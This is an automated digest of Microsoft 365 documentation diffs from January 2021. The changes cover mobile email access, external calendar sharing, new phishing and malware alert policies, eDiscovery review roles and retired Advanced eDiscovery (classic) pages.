Updates from: 01/06/2021 04:07:46
Category Microsoft Docs article Related commit history on GitHub Change details
admin https://docs.microsoft.com/en-us/microsoft-365/admin/email/access-email-from-a-mobile-device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/email/access-email-from-a-mobile-device.md
@@ -21,22 +21,20 @@ description: "Learn how to access email from your mobile device."
# Options for accessing email from your mobile device
-Your organization has configured settings which control what mobile apps you can use to access your work account for email, calendar and contacts.
-
-The Outlook for Android and Outlook for iOS mobile apps are designed for your work or school email, and are the only apps to provide features like [Focused Inbox](https://support.microsoft.com/office/f445ad7f-02f4-4294-a82e-71d8964e3978), which keeps important emails front and center, and [Scheduling Assistant](https://www.microsoft.com/?ref=go), which helps you find meeting times that work with colleagues and simply finds available conference rooms.
+Your organization configures settings which control what mobile apps you can use to access your work account for email, calendar and contacts.
+
+The Outlook for Android and Outlook for iOS mobile apps are designed for your work or school email. These apps provide features like [Focused Inbox](https://support.microsoft.com/office/f445ad7f-02f4-4294-a82e-71d8964e3978), which keeps important emails front and center, and [Scheduling Assistant](https://support.microsoft.com/office/scheduling-made-easy-in-outlook-mobile-11c5bee5-d78a-4a2b-80c2-2b386ddb4470), which helps you find meeting times that work with colleagues and simply finds available conference rooms.
## End user experience
- **Outlook only**
-
+### Outlook Only
+ Your organization requires that you use the Outlook for Android or Outlook for iOS mobile apps to access company email, calendar, and contacts. Your data will start syncing once you download and install Outlook for Android or Outlook for iOS.
-
+ ![Example email to use Outlook to sync email](../../media/798d942a-4181-4dcb-8039-cd9f2edd9723.png)
-
-Check out [Optimize the Outlook mobile app for your iOS or Android phone](https://support.microsoft.com/office/de075b19-b73c-4d8a-841b-459982c7e890) for more Outlook features. And go to [Outlook for iOS and Android Help Center](https://support.microsoft.com/office/cd84214e-a5ac-4e95-9ea3-e07f78d0cde6) if you run into any issues.
-
- **Any email app**
-
-Your organization recommends that you use the Outlook for Android or iOS mobile app to access your work or school account for email, calendar, and contacts. If you don't take any action within the next few hours, your email will automatically begin syncing. If you choose to use the Outlook for Android or iOS mobile app, your data will only sync with the Outlook for Android or Outlook for iOS mobile app. If you choose to continue using the third-party app, your data will start to sync instantly.
-
+Check out [Optimize the Outlook mobile app for your iOS or Android phone](https://support.microsoft.com/office/de075b19-b73c-4d8a-841b-459982c7e890) for more Outlook features. And go to [Outlook for iOS and Android Help Center](https://support.microsoft.com/office/cd84214e-a5ac-4e95-9ea3-e07f78d0cde6) if you run into any issues.
+
+### Any email app
+
+Your organization recommends that you use the Outlook for Android or iOS mobile app to access your work or school account for email, calendar, and contacts. If you don't take any action within the next few hours, your email will automatically begin syncing. If you choose to use the Outlook for Android or iOS mobile app, your data will only sync with the Outlook for Android or Outlook for iOS mobile app. If you choose to continue using the third-party app, your data will start to sync instantly.
\ No newline at end of file
admin https://docs.microsoft.com/en-us/microsoft-365/admin/manage/share-calendars-with-external-users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/manage/share-calendars-with-external-users.md
@@ -21,32 +21,28 @@ search.appverid:
- MET150 - MOE150 ms.assetid: fb00dd4e-2d5f-4e8d-8ff4-94b2cf002bdd
-description: "Learn how to let your users share their calendars with external users for meetings and appointments. "
+description: "Learn how to let your users share their calendars with external users for meetings and appointments."
--- # Share calendars with external users
-It's often necessary to schedule meetings with people outside your organization. To simplify the process of finding mutually agreeable meeting times, Microsoft 365 enables you to make calendars available to "external users," those who need to see free/busy time but don't have user accounts for your Microsoft 365 environment.
-
-Calendar sharing is a global setting, meaning that you, the admin, can enable it for all users in the tenant. Once sharing is enabled, users can use Outlook Web App to share their calendars with anyone inside or outside the organization. People inside the organization can view the shared calendar side-by-side with their own. People outside the organization will be sent a URL that they can use to view the calendar. Users decide when to share, how much to share, and when to keep their calendars private.
-
+It's sometimes necessary for your users to schedule meetings with people outside your organization. To simplify the process of finding common meeting times, Microsoft 365 enables you to make calendars available to these people. These are people who need to see free and busy times for users in your organization, but don't have user accounts for your Microsoft 365 organization.
+
+You can enable calendar sharing for all users in your organization in the Microsoft 365 admin center. Once sharing is enabled, your users can use Outlook Web App to share their calendars with anyone inside or outside the organization. People inside the organization can view the shared calendar along with their own calendar. People outside the organization will be sent a URL that they can use to view the calendar. Users in your organization decide when to share and how much to share.
+ > [!NOTE]
-> If you want to share calendars with an organization that uses Exchange Server 2013 (an on-premises solution), the Exchange administrator will need to set up an authentication relationship with the cloud. This is known as "federation" and must meet minimum software requirements. See [Sharing](https://technet.microsoft.com/library/dd638083%28v=exchg.150%29.aspx) for more information.
+> If you want to share calendars with an organization that uses Exchange Server 2013 (an on-premises solution), the Exchange administrator will need to set up an authentication relationship with the cloud. This is known as federation, and must meet minimum software requirements. See [Sharing](https://technet.microsoft.com/library/dd638083%28v=exchg.150%29.aspx) for more information.
## Enable calendar sharing using the Microsoft 365 admin center
-1. In the admin center, go to **Settings** \> **Org Settings**.
-
+1. In the admin center, go to **Settings** \> **Org Settings**.
+ 2. On the **Services** tab, select **Calendar**.
-3. On the **Calendar** page that opens, choose whether you want to let your users share their calendars with people outside of your organization who have Microsoft 365 or Exchange.
-
-4. Choose whether you want to allow anonymous users (users without logon credentials) to access calendars via an email invitation.
+3. On the **Calendar** page, choose whether you want to let users share their calendars with people outside of your organization who have Microsoft 365 or Exchange. Choose whether you want to allow anonymous users (users without credentials) to access calendars via an email invitation.
-5. Choose what type of calendar information to make available to users. You can allow all information, or limit it to time only or time, subject, and location only.
+4. Choose what type of calendar information to make available to users. You can allow all information, or limit it to time only or time, subject, and location only.
-
## Invite people to access calendars
-Once sharing is enabled for the tenant, calendar owners can extend invitations to specific users. See [Sharing your calendar in Outlook Web App](https://support.microsoft.com/office/7ecef8ae-139c-40d9-bae2-a23977ee58d5) for instructions.
-
+Once sharing is enabled, calendar owners can extend invitations to specific users. See [Sharing your calendar in Outlook Web App](https://support.microsoft.com/office/7ecef8ae-139c-40d9-bae2-a23977ee58d5) for instructions.
\ No newline at end of file
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/alert-policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/alert-policies.md
@@ -43,7 +43,7 @@ Here's a quick overview of how alert policies work and the alerts that are trigg
2. A user performs an activity that matches the conditions of an alert policy. In the case of malware attacks, infected email messages sent to users in your organization trigger an alert.
-3. Microsoft 365 generates an alert that's displayed on the **View alerts** page in the Security & Compliance Center. Also, if email notifications are enabled for the alert policy, Microsoft sends a notification to a list of recipients. The alerts that an admin or other users can see that on the View alerts page is determined by the roles assigned to the user. For more information, see the [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts) section.
+3. Microsoft 365 generates an alert that's displayed on the **View alerts** page in the Security & Compliance Center. Also, if email notifications are enabled for the alert policy, Microsoft sends a notification to a list of recipients. The alerts that an admin or other users can see that on the View alerts page is determined by the roles assigned to the user. For more information, see [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts).
4. An admin manages alerts in the security and compliance center. Managing alerts consists of assigning an alert status to help track and manage any investigation.
@@ -100,7 +100,7 @@ An alert policy consists of the following settings and conditions.
Microsoft provides built-in alert policies that help identify Exchange admin permissions abuse, malware activity, potential external and internal threats, and information governance risks. On the **Alert policies** page, the names of these built-in policies are in bold and the policy type is defined as **System**. These policies are turned on by default. You can turn off these policies (or back on again), set up a list of recipients to send email notifications to, and set a daily notification limit. The other settings for these policies can't be edited.
-The following table lists and describes the available default alert policies and the category each policy is assigned to. The category is used to determine which alerts a user can view on the View alerts page. For more information, see the [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts) section.
+The following table lists and describes the available default alert policies and the category each policy is assigned to. The category is used to determine which alerts a user can view on the View alerts page. For more information, see [RBAC permissions required to view alerts](#rbac-permissions-required-to-view-alerts).
The table also indicates the Office 365 Enterprise and Office 365 US Government plan required for each one. Some default alert policies are available if your organization has the appropriate add-on subscription in addition to an E1/F1/G1 or E3/G3 subscription.
@@ -120,6 +120,11 @@ The table also indicates the Office 365 Enterprise and Office 365 US Government
|**Malware campaign detected after delivery**|Generates an alert when an unusually large number of messages containing malware are delivered to mailboxes in your organization. If this event occurs, Microsoft removes the infected messages from Exchange Online mailboxes. This policy has a **High** severity setting.|Threat management|E5/G5 or Microsoft Defender for Office 365 P2 add-on subscription| |**Malware campaign detected and blocked**|Generates an alert when someone has attempted to send an unusually large number of email messages containing a certain type of malware to users in your organization. If this event occurs, the infected messages are blocked by Microsoft and not delivered to mailboxes. This policy has a **Low** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**Malware campaign detected in SharePoint and OneDrive**|Generates an alert when an unusually high volume of malware or viruses is detected in files located in SharePoint sites or OneDrive accounts in your organization. This policy has a **High** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription|
+|**Malware not zapped because ZAP is disabled**| Generates an alert when Microsoft detects delivery of a malware message to a mailbox because Zero-Hour Auto Purge for Phish messages is disabled. This policy has an **Informational** severity setting. |Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription|
+|**Phish delivered because a user's Junk Mail folder is disabled**|Generates an alert when Microsoft detects a userΓÇÖs Junk Mail folder is disabled, allowing delivery of a high confidence phishing message to a mailbox. This policy has an **Informational** severity setting.|Threat management|E5/G5 or Defender for Office 365 P1 or P2 add-on subscription|
+|**Phish delivered due to an ETR override**|Generates an alert when Microsoft detects an Exchange Transport Rule (ETR) that allowed delivery of a high confidence phishing message to a mailbox. This policy has an **Informational** severity setting. For more information about Exchange Transport Rules (Mail flow rules), see [Mail flow rules (transport rules) in Exchange Online](https://docs.microsoft.com/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules).|Threat management|E5/G5 or Defender for Office 365 P1 or P2 add-on subscription|
+|**Phish delivered due to an IP allow policy**|Generates an alert when Microsoft detects an IP allow policy that allowed delivery of a high confidence phishing message to a mailbox. This policy has an **Informational** severity setting. For more information about the IP allow policy (connection filtering), see [Configure the default connection filter policy - Office 365](https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-the-connection-filter-policy).|Threat management|E5/G5 or Defender for Office 365 P1 or P2 add-on subscription|
+|**Phish not zapped because ZAP is disabled**| Generates an alert when Microsoft detects delivery of a high confidence phishing message to a mailbox because Zero-Hour Auto Purge for Phish messages is disabled. This policy has an **Informational** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription|
|**Phish delivered due to tenant or user override**<sup>1</sup>|Generates an alert when Microsoft detects an admin or user override allowed the delivery of a phishing message to a mailbox. Examples of overrides include an inbox or mail flow rule that allows messages from a specific sender or domain, or an anti-spam policy that allows messages from specific senders or domains. This policy has a **High** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**Suspicious email forwarding activity**|Generates an alert when someone in your organization has auto-forwarded email to a suspicious external account. This is an early warning for behavior that may indicate the account is compromised, but not severe enough to restrict the user. This policy has a **Medium** severity setting. Although it's rare, an alert generated by this policy may be an anomaly. It's a good idea to [check whether the user account is compromised](../security/office-365-security/responding-to-a-compromised-email-account.md).|Threat management|E1/F1/G1, E3/G3, or E5/G5| |**Suspicious email sending patterns detected**|Generates an alert when someone in your organization has sent suspicious email and is at risk of being restricted from sending email. This is an early warning for behavior that may indicate that the account is compromised, but not severe enough to restrict the user. This policy has a **Medium** severity setting. Although it's rare, an alert generated by this policy may be an anomaly. However, it's a good idea to [check whether the user account is compromised](../security/office-365-security/responding-to-a-compromised-email-account.md).|Threat management|E1/F1/G1, E3/G3, or E5/G5 |
@@ -130,7 +135,7 @@ The table also indicates the Office 365 Enterprise and Office 365 US Government
|**Unusual increase in email reported as phish**|Generates an alert when there's a significant increase in the number of people in your organization using the Report Message add-in in Outlook to report messages as phishing mail. This policy has a **High** severity setting. For more information about this add-in, see [Use the Report Message add-in](https://support.office.com/article/b5caa9f1-cdf3-4443-af8c-ff724ea719d2).|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**User impersonation phish delivered to inbox/folder**<sup>1,</sup><sup>2</sup>|Generates an alert when Microsoft detects that an admin or user override has allowed the delivery of a user impersonation phishing message to the inbox (or other user-accessible folder) of a mailbox. Examples of overrides include an inbox or mail flow rule that allows messages from a specific sender or domain, or an anti-spam policy that allows messages from specific senders or domains. This policy has a **Medium** severity setting.|Threat management|E5/G5 or Defender for Office 365 P2 add-on subscription| |**User restricted from sending email**|Generates an alert when someone in your organization is restricted from sending outbound mail. This typically results when an account is compromised, and the user is listed on the **Restricted Users** page in the Security & Compliance Center. (To access this page, go to **Threat management > Review > Restricted Users**). This policy has a **High** severity setting. For more information about restricted users, see [Removing a user, domain, or IP address from a block list after sending spam email](https://docs.microsoft.com/office365/securitycompliance/removing-user-from-restricted-users-portal-after-spam).|Threat management|E1/F1/G1, E3/G3, or E5/G5|
-|||||
+||||
> [!NOTE] > <sup>1</sup> We've temporarily removed this default alert policy based on customer feedback. We're working to improve it, and will replace it with a new version in the near future. Until then, you can create a custom alert policy to replace this functionality by using the following settings:<br/>&nbsp; * Activity is Phish email detected at time of delivery<br/>&nbsp; * Mail is not ZAP'd<br/>&nbsp; * Mail direction is Inbound<br/>&nbsp; * Mail delivery status is Delivered<br/>&nbsp; * Detection technology is Malicious URL retention, URL detonation, Advanced phish filter, General phish filter, Domain impersonation, User impersonation, and Brand impersonation<br/><br/>&nbsp;&nbsp;&nbsp;For more information about anti-phishing in Office 365, see [Set up anti-phishing and anti-phishing policies](../security/office-365-security/set-up-anti-phishing-policies.md).<br/><br/><sup>2</sup> To recreate this alert policy, follow the guidance in the previous footnote, but choose User impersonation as the only Detection technology.
@@ -139,7 +144,7 @@ The unusual activity monitored by some of the built-in policies is based on the
## Viewing alerts
-When an activity performed by users in your organization matches the settings of an alert policy, an alert is generated and displayed on the **View alerts** page in the security and compliance center. Depending on the settings of an alert policy, an email notification is also sent to a list of specified users when an alert is triggered. For each alert, the dashboard on the **View alerts** page displays the name of the corresponding alert policy, the severity and category for the alert (defined in the alert policy), and the number of times an activity has occurred that resulted in the alert being generated. This value is based on the threshold setting of the alert policy. The dashboard also shows the status for each alert. For more information about using the status property to manage alerts, see the [Managing alerts](#managing-alerts) section.
+When an activity performed by users in your organization matches the settings of an alert policy, an alert is generated and displayed on the **View alerts** page in the security and compliance center. Depending on the settings of an alert policy, an email notification is also sent to a list of specified users when an alert is triggered. For each alert, the dashboard on the **View alerts** page displays the name of the corresponding alert policy, the severity and category for the alert (defined in the alert policy), and the number of times an activity has occurred that resulted in the alert being generated. This value is based on the threshold setting of the alert policy. The dashboard also shows the status for each alert. For more information about using the status property to manage alerts, see [Managing alerts](#managing-alerts).
To view alerts, go to [https://protection.office.com](https://protection.office.com) and then select **Alerts** \> **View alerts**.
@@ -159,7 +164,7 @@ You can use the following filters to view a subset of all the alerts on the **Vi
- **Tags.** Use this filter to show alerts from one or more user tags. Tags are reflected based on tagged mailboxes or users that appear in the alerts. See [User tags in Office 356 ATP](..\security\office-365-security\user-tags.md) to learn more. -- **Source.** Use this filter to show alerts triggered by alert policies in the security and compliance center or alerts triggered by Office 365 Cloud App Security policies, or both. For more information about Office 365 Cloud App Security alerts, see the [Viewing Cloud App Security alerts](#viewing-cloud-app-security-alerts) section.
+- **Source.** Use this filter to show alerts triggered by alert policies in the security and compliance center or alerts triggered by Office 365 Cloud App Security policies, or both. For more information about Office 365 Cloud App Security alerts, see [Viewing Cloud App Security alerts](#viewing-cloud-app-security-alerts).
> [!IMPORTANT] > Filtering and sorting by user tags is currently in public preview.
@@ -206,7 +211,7 @@ This design (based on RBAC permissions) lets you determine which alerts can be
The following table lists the roles that are required to view alerts from the six different alert categories. The first column in the tables lists all roles in the Security & Compliance Center. A check mark indicates that a user who is assigned that role can view alerts from the corresponding alert category listed in the top row.
-To see which category a default alert policy is assigned to, see the table in the [Default alert policies](#default-alert-policies) section.
+To see which category a default alert policy is assigned to, see the table in [Default alert policies](#default-alert-policies).
|Role|Information governance|Data loss prevention|Mail flow|Permissions|Threat management|Others| |:---------|:---------:|:---------:|:---------:|:---------:|:---------:|:---------:|
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/analyze-case-data-with-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/analyze-case-data-with-advanced-ediscovery.md deleted file mode 100644
@@ -1,54 +0,0 @@
-title: "Analyze case data with Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MET150-- MOE150
-ms.assetid: dce7a700-3b6e-435f-88ba-e4b82c0f2b26
-description: "Get an overview of the Analyze process, which allows you to set parameters, run options, and view results, in Microsoft 365 Advanced eDiscovery. "
-ms.custom: seo-marvel-apr2020
--
-# Analyze case data with Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The **Prepare** \> **Analyze** process in Advanced eDiscovery applies the following functionality to the included files:
-
-- Identifies and organizes the loaded files into groups of unique files, duplicates, and near-duplicates.
-
-- Identifies and organizes emails into hierarchically structured groups of email threads, based on the progressive inclusiveness of the emails.
-
-- Enables the use of Themes in Advanced eDiscovery processing and file batching.
-
- Analyze allows you to set parameters, run options, and view the results, as follows:
-
-- **Analyze setup**: Allows settings to be specified before running Analyze on the files.
-
-- **Analyze results**: Displays metrics of the analysis.
-
-Before running Analyze, define the criteria for selecting and processing files, including which loaded files will be analyzed and the type of analysis to which each type of file will be submitted.
-
-## Additional resources for Advanced eDiscovery (classic) analysis
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[Viewing Analyze tasks](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/apply-retention-labels-automatically https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/apply-retention-labels-automatically.md
@@ -242,10 +242,10 @@ When you choose the option for a trainable classifier, you can select one of the
To automatically apply a label by using this option, SharePoint sites and mailboxes must have at least 10 MB of data.
-For more information about trainable classifiers, see [Learn about trainable classifiers (preview)](classifier-learn-about.md).
+For more information about trainable classifiers, see [Learn about trainable classifiers](classifier-learn-about.md).
> [!TIP]
-> If you use trainable classifiers for Exchange, see the recently released [How to retrain a classifier in content explorer (preview)](classifier-how-to-retrain-content-explorer.md).
+> If you use trainable classifiers for Exchange, see [How to retrain a classifier in content explorer](classifier-how-to-retrain-content-explorer.md).
To consider when using trainable classifiers to auto-apply retention labels:
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/apply-sensitivity-label-automatically https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/apply-sensitivity-label-automatically.md
@@ -142,7 +142,7 @@ When you select the **Trainable classifiers** option, select one or more of the
> [!CAUTION] > We are deprecating the **Offensive Language** built-in classifier because it has been producing a high number of false positives. Don't use this built-in classifier and if you are currently using it, you should move your business processes off it. We recommend using the **Targeted Harassment**, **Profanity**, and **Threat** built-in classifiers instead.
-For more information about these classifiers, see [Learn about trainable classifiers (preview)](classifier-learn-about.md).
+For more information about these classifiers, see [Learn about trainable classifiers](classifier-learn-about.md).
During the preview period for this option, the following apps support trainable classifiers for sensitivity labels:
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/assessment-in-relevance-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/assessment-in-relevance-in-advanced-ediscovery.md
@@ -16,6 +16,7 @@ search.appverid:
- MET150 ms.assetid: 1d33d4fb-91ed-41c0-b72e-5a26eca3a2a7 description: "Get an overview of the Assessment stage and its role in determining the richness of issues during Relevance training in Microsoft 365 Advanced eDiscovery."
+ROBOTS: NOINDEX, NOFOLLOW
ms.custom: seo-marvel-apr2020 ---
@@ -47,19 +48,4 @@ Each issue has its own richness, current margin of error, and as a result, estim
You can accept the Relevance recommendations or adjust the current margin of error according to your needs. The default current margin of error is determined for recall at equal or above 75%. > [!NOTE]
-> The Assessment stage can be bypassed, in the **Relevance \> Track** tab in the expanded view for an issue, by clearing the **Assessment** check box per issue and then for "all issues". However, as a result, there will be no statistics for this issue. > Clearing the **Assessment** check box can only be done before assessment is performed. Where multiple issues exist in a case, assessment is bypassed only if the check box is cleared for each issue
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
+> The Assessment stage can be bypassed, in the **Relevance \> Track** tab in the expanded view for an issue, by clearing the **Assessment** check box per issue and then for "all issues". However, as a result, there will be no statistics for this issue. > Clearing the **Assessment** check box can only be done before assessment is performed. Where multiple issues exist in a case, assessment is bypassed only if the check box is cleared for each issue.
\ No newline at end of file
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/assign-ediscovery-permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/assign-ediscovery-permissions.md
@@ -140,10 +140,7 @@ This role lets users view a list of items that were returned from a Content Sear
### Review
-This role lets users access case data in [Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md) (also know as *Advanced eDiscovery v1*). The primary purpose of this role is to give users access to Advanced eDiscovery (classic). Users who are assigned this role can see and open the list of cases on the **eDiscovery** page in the Security & Compliance Center that they're members of. After the user accesses a case in the Security & Compliance Center, they can select **Switch to Advanced eDiscovery** to access and analyze the case data in Advanced eDiscovery (classic). This role doesn't allow the user to preview the results of a content search that's associated with the case or do other content search or case management tasks.
-
-> [!NOTE]
-> At this time, users who are assigned the Review role (or is a member of the Reviewer role group) can't access data in [Advanced eDiscovery in Microsoft 365](overview-ediscovery-20.md) (also known as *Advanced eDiscovery v2.0*). To add members to a case in Advanced eDiscovery v2.0 so that they can review case data, a user must be a member of the eDiscovery Manager role group.
+This role lets users access review sets in [Advanced eDiscovery](overview-ediscovery-20.md). Users who are assigned this role can see and open the list of cases on the **eDiscovery > Advanced** page in the Microsoft 365 compliance center that they're members of. After the user accesses an Advanced eDiscovery case, they can select **Review sets** to access case data. This role doesn't allow the user to preview the results of a collection search that's associated with the case or do other search or case management tasks. Users with this role can only access the data in a review set.
### RMS Decrypt
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/classifier-learn-about https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/classifier-learn-about.md
@@ -20,7 +20,7 @@ search.appverid:
description: "A Microsoft 365 trainable classifier is a tool you can train to recognize various types of content by giving it positive and negative samples to look at. Once the classifier is trained, you confirm that its results are accurate. Then you use it to search through your organization's content and classify it to apply retention or sensitivity labels or include it in data loss prevention (DLP) or retention policies." ---
-# Learn about classifiers
+# Learn about trainable classifiers
Classifying and labeling content so it can be protected and handled properly is the starting place for the information protection discipline. Microsoft 365 has three ways to classify content.
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/decision-based-on-the-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/decision-based-on-the-results-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MET150 ms.assetid: aed65bcd-0a4f-43e9-b5e5-b98cc376bdf8 description: "Learn how the Decide tab in Advanced eDiscovery provides data that can help you determine the correct size of the review set of case files."
+ROBOTS: NOINDEX, NOFOLLOW
ms.custom: seo-marvel-apr2020 ---
@@ -49,17 +50,3 @@ This tab includes the following components:
The expanded Details pane displays additional details. Files in collection figures do not include empty or nebulous files. Family files figures represent files that are not loaded in Relevance, yet still counted as part of the family.
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Performing Relevance training](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/define-case-and-tenant-settings-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/define-case-and-tenant-settings-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,91 +0,0 @@
-title: "Define case and tenant settings in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 383809de-7f5e-4a1d-9098-c525f67b7a9a
-description: "Learn about the labels, cross module, and tenant settings that you can define at the case level in Advanced eDiscovery."
-
-# Define case and tenant settings in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The Advanced eDiscovery case and tenant settings are described in this topic.
-
-## Case settings
-
-This sections describes the settings that can be defined at the case level.
-
-> [!NOTE]
-> If no case is currently selected in Advanced eDiscovery, the **Case settings** tab is inactive.
-
-### Cross module
-
-The following Cross module settings are case options that apply to Advanced eDiscovery modules.
-
-- Default page after login: Sets the default page to be displayed upon starting Advanced eDiscovery.
-
-- File display name: File identifier that will be displayed throughout Advanced eDiscovery to identify the file, as an alternative to the Advanced eDiscovery display name of file title/path or email subject.
-
-1. Open **Settings and utilities** by clicking the **Cogwheel** icon. Open **Settings and utilities \> Case settings** tab \> **Cross module**.
-
-2. Select from the **Default page after login** options:
-
- - **Last page of previous login**
-
- - **Cases page**
-
-3. Click **Save**.
-
-## Tenant settings
-
-The Advanced eDiscovery Tenant settings are described in this section.
-
-### User administration
-
-The User administration options are described in [Setting up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md).
-
-### Event log
-
-The Event log provides metadata regarding Advanced eDiscovery processing anytime during Advanced eDiscovery operation. For example, it includes the start time of the main Advanced eDiscovery processes (Import, Analyze, Relevance, and Export) as well as the end time and status. This log can be used for tracking and troubleshooting data processing activities and for addressing errors and warnings.
-
-1. Open **Settings and utilities** by clicking the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Tenant settings** tab, select **Event log**. The event log data is displayed.
-
- - To filter the log output by a case, select the case from the **Cases** list.
-
- - To sort the log by columns, click a column header.
-
- - To modify column order, click and drag the column header.
-
- - To move between log pages, click **\>** and **\<** icons.
-
-### System information
-
-Advanced eDiscovery version system information and active tasks are displayed in the Tenant settings tab.
-
-1. Open **Settings and utilities** by clicking the **Cogwheel** icon.
-
-2. In the **Settings and utilities \> Tenant settings** tab, select **System information**. The version information is displayed.
-
-The display can be updated by clicking the **Refresh** icon below the Tenant information.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Using utilities](use-advanced-ediscovery-utilities.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/define-highlighted-keywords-and-advanced-options https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/define-highlighted-keywords-and-advanced-options.md deleted file mode 100644
@@ -1,77 +0,0 @@
-title: "Define highlighted keywords and advanced options in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: chrfox
-author: chrfox
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 03cc4387-2c7d-4058-8a44-0deefb58f011
-description: "Learn how to add user-defined keywords to Relevance to help identify relevant files while tagging in Advanced eDiscovery and to specify cost parameters."
-
-# Define highlighted keywords and advanced options in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, it's possible to add user-defined keywords to Relevance in order to help you identify relevant files while tagging. Keywords will be displayed in the specified colors in **Relevance \> Tag**.
-
-As described below, keyword lists can be added, and colors assigned to the Keywords list and the related issues. A tooltip displays the keyword's description, if one exists, as indicated by a double underline.
-
-> [!IMPORTANT]
-> Hit highlighting in Relevance and viewing keyword hit results within documents during Relevance tagging does not work for the Japanese, Chinese, and Korean double-byte character sets.
-
-## Adding highlighted keywords
-
-1. In the **Relevance \> Relevance setup** tab, select **Highlighted keywords**.
-
-2. Click the **+** icon to add keywords. The **Add new keywords** dialog is displayed.
-
-3. In **Keywords**, type the keywords list, separating keywords with commas.
-
-4. In the **Color** list, select the color to highlight the entered keywords list.
-
